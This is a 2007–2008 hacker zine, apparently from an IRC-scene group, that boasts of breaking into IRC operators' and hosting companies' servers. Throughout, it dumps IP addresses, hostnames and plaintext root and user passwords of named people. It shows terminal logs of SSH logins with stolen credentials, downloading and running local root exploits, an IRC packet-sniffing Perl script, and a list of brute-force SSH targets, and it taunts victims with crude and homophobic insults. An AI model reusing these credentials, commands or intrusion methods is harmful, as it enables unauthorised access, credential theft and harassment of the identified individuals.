#!/local/efnet/el8/efnet/corporation ################################################ ### x0x0x x0x0x x0x0x x0x0x x0x0x x0x0x ### ### x0x0x x0x0x x0x0x x0x0x x0x0x x0x0x ### ### x0x0x x0x0x x0x0x x0x0x x0x0x x0x0x ### ################################################ # # # # # ÛÛÛÛ ÛÛÛÛ # # ÛÛ± ÛÛ ÛÛ± ÛÛ² # # ÛÛÛ ÛÛ ±ÛÛ ±Û° °ÛÛ ÛÛ ÛÛ ±ÛÛ °ÛÛ ÛÛ° # # ÛÛ²ÛÛ ²ÛÛ °Û² °Û²ÛÛ ÛÛ °ÛÛ °Û²ÛÛ° # # ÛÛÛ ²ÛÛ °Û± ÛÛÛ ÛÛ °ÛÛ ÛÛÛ # # °ÛÛÛ± ±ÛÛ ±Û° ÛÛÛ± ÛÛ ±ÛÛ ÛÛÛ± # # ÛÛ°ÛÛ ÛÛ± ÛÛ ²Û°ÛÛ ÛÛ± ÛÛÛ ²Û°ÛÛ² # # ÛÛ² ÛÛ ÛÛÛÛ ²Û² ÛÛ ÛÛÛÛ ²Û² ÛÛ² # # # ################################################ # # # .: second zine :. # # # # [ tribute to efnet el8 corp ] # # # # # # date: december 2007 # # update: march 2008 # # # # # #<><><><><><><><><><><><><><><><><><><><><><><># # # # -= always keeping the secret identify =- # # # #<><><><><><><><><><><><><><><><><><><><><><><># .''. (~~~~) || __||__ /______\ | |' _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ | |'|o| - - - - - - - - - - - - - - - - - - - - - - - - -|| | |'| | || | |'| | . ' . || | |'| | . ' ' . || | |'| | . ' .-'"'-. ' . || | |'| | . ' ," ". ' . || |r |'| | . ' /: x0x0x :\ ' . || |s |'| | . ' ; . x0x0x ; ' . || |t |'| | ' . \: ..x0x0x :/ . ' || | |'| | ' . `. . . ,/ . ' || | |'| | ' . `-.,,.-' . ' || | |'| | ' . . ' || | |'| | ' . . ' || | |'| | ' || | |'|o|-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_|| | |' | |' | |' united by brazil - 100% BRAZUKAAAAAAAAAAAA | |' '~~' \\ // A long time ago, most part of 'leet' user of efnet network didnt like brazilians, saying they are 'packet kiddies', 'lammers'. these 'leet' users start to believe about it, but they think all .br guys was that! So we have the idea of laugh of these 'leet boys' and start to publish to everbody see what really happens on efnet! hehehe Some passwords we´ll not publish, only to avoid surprises in our access! They are smart! but! we´re looking at them! // \\ */ TARGETS : SHELL ACCOUNTS && EFNUT HUXORS && IRCOPS && EFNET SERVERS /* STEVOO w45 h4ck3d... oMG iRcop Admin HackEd ??? Yeah.. She/HE Is!! Stevoo / Stefan !! PoOoooooooooooooWWwwww !!! Results: http://img149.imageshack.us/img149/356/stevootn3.jpg login as: root root@83.140.180.6's password: Last login: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx [root@quagga ~]# uname -a;ifconfig;cat /etc/passwd|grep bash Linux quagga.webguidepartner.com 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux #0h 5ur3 n0w w3 4r3 47 stevoo m41n 53rv3r!! okk stevooooooooo =****!!! n0w w3 wi11 5n1ff u! [root@quagga ~]# cat /etc/passwd|grep bash root:x:0:0:root:/root:/bin/bash zabbix:x:1001:1001:,,,:/home/zabbix:/bin/bash stevoo:x:1002:1002:Stefan Larsson,,,:/home/stevoo:/bin/bash lunkan:x:1000:1000:,,,:/home/lunkan:/bin/bash ftp:x:112:65534::/home/ftp:/bin/bash moffe:x:1003:1003:,,,:/home/moffe:/bin/bash j-dog:x:1004:1004:,,,:/home/j-dog:/bin/bash mac:x:1005:1005:,,,:/home/mac:/bin/bash irc:x:1006:1006:,,,:/home/irc:/bin/bash ustas:x:1007:1007:,,,:/home/ustas:/bin/bash dubkat:x:1008:1008:,,,:/home/dubkat:/bin/bash sonny:x:1009:1009:,,,:/home/sonny:/bin/bash flyguy:x:1010:1010:,,,:/home/flyguy:/bin/bash ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^~~~~~~~~~~~~~~~~FINDING NEMOOOOOOOOOOO~~~~~~~~~~~~~~^ ^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^ ^^^^^^^^^^ ^^^^^ _ (_) | . . |L /| . _ _ . |\ _| \--+._/| . (_) / ||\| Y J ) / |/| ./ J |)'( | ` F`.'/ _ -<| F __ .-< (_) | / .-'. `. /-. L___ J \ < \ | | O\|.-' _ _J \ .- \/ O | | \ |F (_) '-F -<_. \ .-' `-' L__ __J _ _. >-' )._. |-' `-|.' /_. \_| F /.- . _.< /' /.' .' `\ /L /' |/ _.-'-\ /'J ___.---'\| |\ .--' V | `. ` |/`. `-. `._) / .-.\ VK \ ( `\ `.\ [root@quagga ~]# cd /l4m3d1r/; cat p455w0rdz.txt WIKI ---------------- user = putumayo pass = utE09X2 FINALTEST ----------------- user = finaltest pass = FINAL06tst POKERLISTINGS.COM -------------------------------- user = turbonegro pass = eFb9KLm POKER USER -------------------- user = poker pass = kLmn09Q3 ROOT ---- user = root pass = 5aB197cQ NEW = UZk9Taj23 ----------------- THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX >>>>>>>>>>> AS YOU CAN SEE STEVOO IS A GOOD ADMIN! SAVING PASSWORDZ IN YOUR HOME FILEZZZZZZ <<<<<<<<<<<< THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX #dubkat 4nd sonny!!! g00d 74rg3755!!!!!! #0kkk!! ch3ck1ng 1p5!!!!!!!!!! [root@quagga ~]# ifconfig eth0 Link encap:Ethernet HWaddr 00:13:72:7B:7B:C9 inet addr:83.140.180.6 Bcast:83.140.180.255 Mask:255.255.255.0 inet6 addr: fe80::213:72ff:fe7b:7bc9/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:383711035 errors:0 dropped:0 overruns:0 frame:0 TX packets:476418783 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:3959576563 (3.6 GiB) TX bytes:1066088994 (1016.7 MiB) Interrupt:169 eth0:0 Link encap:Ethernet HWaddr 00:13:72:7B:7B:C9 inet addr:83.140.180.2 Bcast:83.140.180.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 Interrupt:169 eth0:1 Link encap:Ethernet HWaddr 00:13:72:7B:7B:C9 inet addr:83.140.180.151 Bcast:83.140.180.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 ................................ ................................ ...................... .................... hmmmmmmmmmmmmm 7h3 1p 15 u53d t0 c0nn3c7 70 efnet.port80.se!! l375 ch3ck ?!? .................... ## Just ip(83.140.180.2 ) can access port80.se, okay honey!! do that! [root@quagga ~]# ssh -l root -b 83.140.180.2 efnet.port80.se root@83.140.180.6's password: Last login: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx [root@efnet ~]# uname -a FreeBSD efnet.port80.se 6.2-RELEASE-p8 FreeBSD 6.2-RELEASE-p8 #0: Sat Nov 3 01:23:30 CET 2007 root@efnet.port80.se:/usr/obj/usr/src/sys/EFNET i386 #0hhhhhhhh g0dddddddddddddd!!! port80.se 0wn333333ddddddddddddd!!!! l000000000lllllllll!!!!! l375 ch3ck m4ch1n3 *********************************************** ////////// ///////////\\\\\\\\\\ \\\\\\\\\\ ////////// !!!ILEGAL TOOL FOUND!!! \\\\\\\\\\ ////////// //////////// \\\\\\\\\\\ \\\\\\\\\\ +++++++++++++++++++++++++++++++++++++++++++++++++++++ [root@efnet xxxxx]# cat ircsniff.pl #!/usr/bin/perl if(@ARGV == 0) { print "Args: $ARGV[0] [port]\n"; exit(0); } if(@ARGV == 1) { $port = $ARGV[0]; open(FH, "tshark -tad -lnx -d tcp.port==$port,irc -R 'irc' |") or die "Unable to open wireshark."; } my $packet = ""; while() { chomp($_); chomp($_); if($packet && /^$/) { for(split /\r\n/, $packet) { if(/(:[^ ]+ PRIVMSG .*)$/i) { print "<- $1\n"; } elsif(/(PRIVMSG .*)$/i) { print "-> $1\n"; } } $packet = ""; } if(/^[\da-f]{4} (([\da-f]{2} ?)+) /) { my $a = $1; $a =~ s/([\da-f]{2})\s?/chr(hex($1))/eg; $packet .= $a; } } close(FH); %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%% %% later thay say that ircops dont sniffz this server on efnet! there this the test! % % % Lets Joke: [root@quagga ~]# wget www.site.com/bnc.perl;perl bnc.perl 8000 st3v0 on irc: /server 83.140.180.6:8000 * Connecting to 83.140.180.6 (8000) -216.47.178.108- *** [BNC 1.8-teste9 por 0ldW0lf - Atrix Team] -216.47.178.108- *** Digite /QUOTE PASS -216.47.178.108- *** Senha aceita. Bem vindo, administrador! -216.47.178.108- *** Digite /QUOTE CONN [opções] -216.47.178.108- *** Para lista os comandos da BNC digite /QUOTE BHELP -BNC- [Admin LOG]: Usuário administrador logou /quote conn efnet.port80.se:6667 /server efnet.port80.se /nick stevoo_gay #get oper /oper ***** ***** #COOL stevoo@83.140.180.6 gets spoofed host!! /msg #x0x0x h3110 w0r1d! x0x0x_0wn is stevoo@127.0.0.1 * Stefan Larsson [STLA-RIPE] x0x0x_0wn using efnet.port80.se We eat more pussy! x0x0x_0wn is a beaver gourmet (Server Administrator) x0x0x_0wn has been idle 5secs, signed on Mon Nov 05 16:36:48 x0x0x_0wn End of /WHOIS list. ll0000000000llllllllllllllllllllll!! stevoo u are the magic!!!! &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&&&& 7w0 y34r5 5n1ff1ng ur h0m3 b0x stevoo , 7h3n w3 g37 s0m3 4cc355 , my fr13nd 1337´5 533 7h3n ? x0x0x h4v3 100% 4cc355 1n ur 0wn n37w0rk, 4nd 07h3r5 ,` `/` `. ,\ /` ` ' /, ' ,` \ ` / ` ` ' ,.,`, /-/- ``/= = \ ,` '' ' @' @' ) \ //|'/ ) |\ |\` cf ( ,,',, ) \__ -- _/ `--' "STEVOO is synonymous of SUPERMAN!" Albert Einstein ************************** tevoo .*##*:*####***:::**###*:######*. tevoo *##: .###* *######:,##* tevoo *##: :####: *####*. :##: tevoo *##,:########**********:, :##: tevoo .#########################*, *#* tevoo *#########################*##: tevoo *##, ..,,::**#####: tevoo ,##*,*****, *##* tevoo *#########*########: tevoo *##*:*******###* tevoo .##*. ,##* tevoo :##* *##, tevoo *####: tevoo :, tevoo &&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&&&& &&&&&&&&&& &&&& && & #Spain Host [root@x0x0x ~]# ssh 91.142.209.1 root@91.142.209.1's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux es.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 i686 i386 GNU/Linux bash# exit #Australian Host [root@x0x0x ~]# ssh 202.125.41.133 -l sonny.sarai sonny.sarai@202.125.41.133's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash$ su root Password: xxxxxx bash# uname -a Linux au.int.webguidepartner.com 2.6.9-34.EL #1 Wed Mar 8 00:07:35 CST 2006 i686 athlon i386 GNU/Linux bash# exit #Flexservers is a box very important with importants files that i WONT publish !! lol : [root@x0x0x ~]# ssh 213.239.174.129 root@213.239.174.129 's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux flexserver.flexservers.com 2.6.22.9 #2 SMP Fri Oct 5 17:52:23 CEST 2007 i686 i686 i386 GNU/Linux bash# exit #German Host [root@x0x0x ~]# ssh 80.86.82.231 -l sonny.sarai sonny.sarai@80.86.82.231's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash$ su root Password: xxxxxx bash# uname -a Linux de 2.6.16.1-amd-webperoni-06042006-1 #1 Thu Apr 6 17:01:51 CEST 2006 i686 athlon i386 GNU/Linux bash# exit #Idiot box good bandwith ## used to host my worm some days lol [root@x0x0x ~]# ssh 205.234.178.244 root@205.234.178.244's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux lb1 2.6.15-2-amd64 #1 SMP Tue Aug 28 17:53:01 BST 2007 x86_64 GNU/Linux bash# exit #Suomi Host [root@x0x0x ~]# ssh 217.30.189.33 root@217.30.189.33's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux fi.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 i686 i386 GNU/Linux bash# exit #Netherlands Host [root@x0x0x ~]# ssh 81.171.121.170 root@81.171.121.170's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux nl.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 athlon i386 GNU/Linux (dedicated.by.twilightinc.nl) bash# exit #Netherlands Host [root@x0x0x ~]# ssh 217.30.189.33 root@217.30.189.33's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux nl.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 athlon i386 GNU/Linux (dedicated.by.twilightinc.nl) bash# exit #Canada Host [root@x0x0x ~]# ssh 204.15.197.130 root@204.15.197.130's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux gw.ca.webguidepartner.com 2.6.9-42.0.3.ELsmp #1 SMP Fri Oct 6 06:21:39 CDT 2006 i686 i686 i386 GNU/Linux bash# /lib/ldd 2242 83.140.43.249 (per:5!vcAP8!) 83.140.43.49 (stefan:n1nj4h1978) *old pass of stevoo i wont said new pass!* bash# exit #Malasya Host [root@x0x0x ~]# ssh 124.217.250.115 root@124.217.250.115's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux my.int.webguidepartner.com 2.6.9-42.0.10.ELsmp #1 SMP Tue Feb 27 10:11:19 EST 2007 i686 i686 i386 GNU/Linux bash# exit #Spain Host [root@x0x0x ~]# ssh 75.126.49.137 root@75.126.49.137's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux es.int.webguidepartner.com 2.6.9-42.0.3.ELsmp #1 SMP Mon Sep 25 17:28:02 EDT 2006 i686 i686 i386 GNU/Linux bash# exit #Usa gayl0rd Host [root@x0x0x ~]# ssh 69.20.4.41 root@69.20.4.41's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux us.int.webguidepartner.com 2.6.9-42.0.2.EL #1 Thu Aug 17 17:36:53 EDT 2006 i686 athlon i386 GNU/Linux bash# exit #Malasya Host of some boxes i will show some login:password to show that´s not fake! : (per:5!vcAP8!) (sonny.sarai:comp1409sonny) (stefan:n1nj4h1978) (root:JAk9Taj23) (h00h0h0) [root@x0x0x ~]# ssh 74.53.191.130 root@74.53.191.130's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux webhostingsearch.com.theplanet.host 2.6.18-8.1.8.el5 #1 SMP Mon Jun 25 17:06:19 EDT 2007 i686 i686 i386 GNU/Linux (82.bf.354a.static.theplanet.com) bash# exit //idiots using same root password and personal logins in all boxes!! that´s love! #Dev dataBase Host [root@x0x0x ~]# ssh 83.140.180.235 -l anna root@83.140.180.235's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash$ su root Password: xxxxxx bash# uname -a Linux devbase 2.6.18-53.1.4.el5PAE #1 SMP Fri Nov 30 01:21:20 EST 2007 i686 i686 i386 GNU/Linux bash# ssh acad23@204.200.222.171 root@83.140.180.235's password: Eb11Be22 [acad23@academicinfo.net ~]$ exit; bash# exit *&#¨*&$#@¨*&($#@¨*&$(¨#@&($*¨#$@&*($¨#(@*&#$¨($@¨#&( #$¨*&$¨@*&($#@*(¨($#@¨(@#$¨*&(#$@¨&($@#¨*&( #HAHHAHAHA "FULL HACK"0rz owned!! good hax0rs!! #$¨*&$¨@*&($#@*(¨($#@¨(@#$¨*&(#$@¨&($@#¨*&( *&#¨*&$#@¨*&($#@¨*&$(¨#@&($*¨#$@&*($¨#(@*&#$¨($@¨#&( [root@x0x0x ~]# ssh 83.140.33.134 -l stevoo stevoo@83.140.33.134 's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash$ su root Password: xxxxxx bash# uname -a Linux spark.bgpmonkey.net 2.6.20-1.2320.fc5 #1 Tue Jun 12 18:50:38 EDT 2007 i686 i686 i386 GNU/Linux bash# ssh acad23@204.200.222.171 (acad23:Eb11Be22) [acad23@academicinfo.net ~]$ exit; bash# exit **************************** ############################ **# **# want get ircop? *# # try on fulhack irc: /oper stevoo bajs # #Other shit [root@x0x0x ~]# ssh 83.140.2.18 -l per per@83.140.2.18's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash$ su root Password: xxxxxx bash# uname -a Linux rock-dk 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686 i686 i386 GNU/Linux bash# exit #Other shit 2!! [root@x0x0x ~]# ssh 82.103.140.20 -l Customer Customer@82.103.140.20's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash$ su root Password: xxxxxx bash# uname -a Linux e82-103-140-20s.easyspeedy.dk 2.6.18-53.el5PAE #1 SMP Mon Nov 12 02:55:09 EST 2007 i686 athlon i386 GNU/Linux bash# exit #Other shit 3!! [root@x0x0x ~]# ssh 82.140.8.18 root@82.140.8.18's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux mx.rockintention.com 2.6.18-8.1.8.el5 #1 SMP Tue Jul 10 06:50:22 EDT 2007 i686 i686 i386 GNU/Linux bash# exit #Other shit 4!! [root@x0x0x ~]# ssh 83.140.180.63 (rootpass = mortgage4711) root@83.140.180.63's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux harry.webguidepartner.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 2008 i686 athlon i386 GNU/Linux bash# exit #Other shit 5!! [root@x0x0x ~]# ssh 82.96.22.90 root@82.96.22.90's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux se.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 athlon i386 GNU/Linux bash# exit #Other shit 6!! [root@x0x0x ~]# ssh 82.103.140.117 root@82.103.140.117's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux rake 2.6.18-8.1.10.el5 #1 SMP Thu Sep 13 12:17:54 EDT 2007 i686 athlon i386 GNU/Linux bash# exit #Other shit 7!! [root@x0x0x ~]# ssh 83.140.180.3 root@83.140.180.3's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux failover.webguidepartner.com 2.6.9-34.0.2.ELsmp #1 SMP Fri Jul 7 19:52:49 CDT 2006 i686 i686 i386 GNU/Linux bash# exit #Other shit 8!! [root@x0x0x ~]# ssh 83.140.43.100 root@83.140.43.100's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux db.sweden.webguidepartner.com 2.6.9-42.0.2.ELsmp #1 SMP Wed Aug 23 00:17:26 CDT 2006 i686 i686 i386 GNU/Linux bash# exit #Other shit 9!! [root@x0x0x ~]# ssh 83.140.43.100 root@83.140.43.100's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux db.sweden.webguidepartner.com 2.6.9-42.0.2.ELsmp #1 SMP Wed Aug 23 00:17:26 CDT 2006 i686 i686 i386 GNU/Linux bash# exit #Other shit 10!! [root@x0x0x ~]# ssh 83.140.43.71 root@83.140.43.71's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux skalman 2.6.18-8.el5xen #1 SMP Fri Jan 26 14:42:21 EST 2007 i686 i686 i386 GNU/Linux bash# exit #Other shit 10!! [root@x0x0x ~]# ssh 83.140.43.26 root@83.140.43.26's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux db.sweden.webguidepartner.com 2.6.9-42.0.2.ELsmp #1 SMP Wed Aug 23 00:17:26 CDT 2006 i686 i686 i386 GNU/Linux bash# exit #Other shit 11!! [root@x0x0x ~]# ssh 67.192.39.119 root@83.140.43.26's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash# uname -a Linux 133972-dev.mortgageloan.com 2.6.18-8.1.8.el5 #1 SMP Mon Jun 25 17:06:19 EDT 2007 i686 athlon i386 GNU/Linux bash# exit OK! Fuck uname´s !! lets go to something more interesting! [root@x0x0x ~]# ssh 216.240.158.191 -l lcars lcars@216.240.158.191's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash$ wget xpl_local_root_leet.bin; chmod a+x xpl_local_root_leet.bin; ./xpl_local_root_leet.bin bash# rm -rf xpl_local_root_leet.bin; bash# uname -a Linux kingdom.scns.com 2.6.23.14-64.fc7 #1 SMP Sun Jan 20 23:54:08 EST 2008 i686 i686 i386 GNU/Linux bash# exit ............................................. ,-. , ,-. s ,-. / \ ( r )-( t ) \ | ,.>-( )-< \|,' ( )-( ) Y ___`-' `-' |/__/ `-' | | | -dubkat my flower- ___|_____________ ;................ OkAy my Friend DuBKat ... i know that u are good person... but i need show u something! lol [root@x0x0x ~]# ssh 72.37.235.2 -l dubkat dubkat@72.37.235.2's password: sjpd3139 Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash$ wget shmat2; chmod a+x shmat2; ./shmat2 .................................................................. .................................................................. .................................................................. .................................................................. .................................................................. .................................................................. .................................................................. ...........................................p00f! NIX@# id uid=0(root) gid=0(root) bash# rm -rf shmat2; bash# uname -a FreeBSD riley.rsc.cx 6.2-RELEASE-p5 FreeBSD 6.2-RELEASE-p5 #3: Thu May 24 10:08:07 PDT 2007 sg@riley.rsc.cx:/usr/obj/usr/src/sys/RILEY i386 bash# exit ............................................. ;................QUAKENET HUB #Thkxxxxxxx g0d [root@x0x0x ~]# ssh 64.237.63.164 -l sl sl@64.237.63.164's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash$ wget shmat2; chmod a+x shmat2; ./shmat2 .................................................................. .................................................................. .................................................................. .................................................................. .................................................................. .................................................................. .................................................................. ...........................................p00f! NIX@# id uid=0(root) gid=0(root) bash# rm -rf shmat2; bash# uname -a FreeBSD hub.us.quakenet.org 6.2-RELEASE-p4 FreeBSD 6.2-RELEASE-p4 #0: Tue May 22 13:08:26 EDT 2007 root@qhub.gameservers.com:/usr/obj/usr/src/sys/QUAKENET i386 bash# netstat -na|grep .6667|wc -l 1544 # lets drop 6667 ? l0lll bash# exit Others boxes... that we get on sniff ´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´ ´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´ ´´´´´ FreeBSD fw.webguidepartner.com 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #0: Fri Oct 13 03:04:33 UTC 2006 sullrich@builder.livebsd.com:/usr/obj.pfSense/usr/src/sys/pfSense.6 i386 ´´´´´ Linux rock-dk 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686 i686 i386 GNU/Linux ´´´´´ Linux lurvas 2.6.9-34.0.2.ELsmp #1 SMP Fri Jul 7 19:52:49 CDT 2006 i686 i686 i386 GNU/Linux (lurvas.webguidepartner.com) OLD...... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ )/_ _.--..---"-,--c_ \L..' ._O__)_ ,-. _.+ _ \..--( / `\.-''__.-' \ ( \_ `''' `\__ /\ ') MONSTERSHELLSSSSSSS (its gone... :(!) ~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [root@x0x0x ~]# ssh phisher1@fire.monstershells.com phisher1@fire.monstershells.com's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash$ sudo su - Password: bash# id uid=0(root) gid=0(root) groups=0(root) bash# uname -a FreeBSD fire.monstershells.com 6.3-RELEASE-p1 FreeBSD 6.3-RELEASE-p1 #0: Fri Feb 15 01:47:13 UTC 2008 root@box.domain.com:/usr/obj/usr/src/sys/fire i386 ****** OH THKS IDIOT ******** some logins there ||;; || || login in: john:v1p3r007 || login in: icon:anthony1 || login in: hack:seven7 || login in: kuwait:ln7EZB3LBd || login in: absolutely:viper007 || login in: shield:H4ilhitler! || login in: john:v1p3r007 ||;; PHISHER YOU ARE My POPSTAR!!! ssh phisher1@home.phisher1.com (98.200.198.242) phisher1@home.phisher1.com's password: xxxxxxxxxx Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx bash$ sudo su - Password: bash# id uid=0(root) gid=0(root) groups=0(root) bash# uname -a Linux kubuntu 2.6.22-14-generic #1 SMP Tue Feb 12 07:42:25 UTC 2008 i686 GNU/Linux bash# &&& THKS FOR GIVE UR BOX TO US USE TO CHECK SOME BRUTEFORCE LIST.. THE SAME THAT WE FOUND ON MONSTERSHELLS LOL &&& bash# cd /dev/.tty64; cat list ssh oracle@12.0.42.6 ssh oracle@128.59.59.62 ssh oracle@129.173.66.56 ssh oracle@91.103.96.18 ssh oracle@84.242.3.6 ssh oracle@83.17.87.138 ssh oracle@83.149.192.29 ssh oracle@82.94.199.146 ssh oracle@82.91.199.194 ssh oracle@82.147.71.143 ssh oracle@83.149.192.29 ssh oracle@82.147.71.143 ssh oracle@82.147.130.245 ssh oracle@82.114.101.66 ssh oracle@80.190.230.26 ssh oracle@80.249.110.130 ssh oracle@80.250.178.89 ssh oracle@80.251.163.21 ssh oracle@80.65.128.175 ssh oracle@209.84.255.105 ssh oracle@58.120.225.124 ssh oracle@63.209.12.251 ssh oracle@68.167.115.234 ssh oracle@58.120.225.124 ssh oracle@72.244.100.245 ssh oracle@58.120.225.124 ssh oracle@68.167.115.234 ssh oracle@63.120.68.100 ssh oracle@63.136.1.22 ssh oracle@91.103.96.18 ssh oracle@68.178.81.200 ssh oracle@82.110.102.235 ssh oracle@82.110.214.40 ssh oracle@82.102.93.4 ssh oracle@81.95.128.1 ssh oracle@81.95.128.11 ssh oracle@78.90.100.203 ssh oracle@80.249.110.130 ssh oracle@80.250.178.89 ssh oracle@80.251.163.21 ssh oracle@209.84.255.105 ssh oracle@63.123.44.22 ssh oracle@139.102.15.28 ssh oracle@128.175.13.183 ssh oracle@193.86.200.120 ssh oracle@78.90.100.203 ssh oracle@82.110.102.235 ssh oracle@82.94.199.146 ssh oracle@82.147.71.143 ssh oracle@129.173.66.56 ssh oracle@128.59.59.62 ssh oracle@72.83.128.115 ssh oracle@139.102.15.28 ssh oracle@128.59.59.62 ssh oracle@72.83.128.115 ssh oracle@128.175.13.183 ssh oracle@12.111.69.145 ssh oracle@128.175.13.183 ssh oracle@12.111.69.145 ssh oracle@72.244.100.245 ssh oracle@80.190.230.26 ssh oracle@139.102.15.28 ssh oracle@casaba.cc.columbia.edu ssh oracle@128.59.59.62 ssh oracle@139.102.15.28 ssh oracle@139.102.15.33 ssh oracle@139.102.15.28 ssh root@213.239.174.129 ssh math402@master.queensu.ca ssh math402@mast.queensu.ca ssh root@74.221.128.106 ssh root@213.239.174.129 ssh math402@mast.queensu.ca ssh oracle@129.173.66.56 ssh 213.239.174.129 -l root ssh oracle@209.5.106.100 ssh oracle@209.84.255.104 ssh oracle@209.84.255.104 ssh oracle@209.84.255.105 ssh oracle@130.89.1.65 ssh oracle@130.192.112.103 ssh oracle@130.60.68.125 ssh oracle@194.204.32.101 ssh oracle@80.251.163.21 ssh 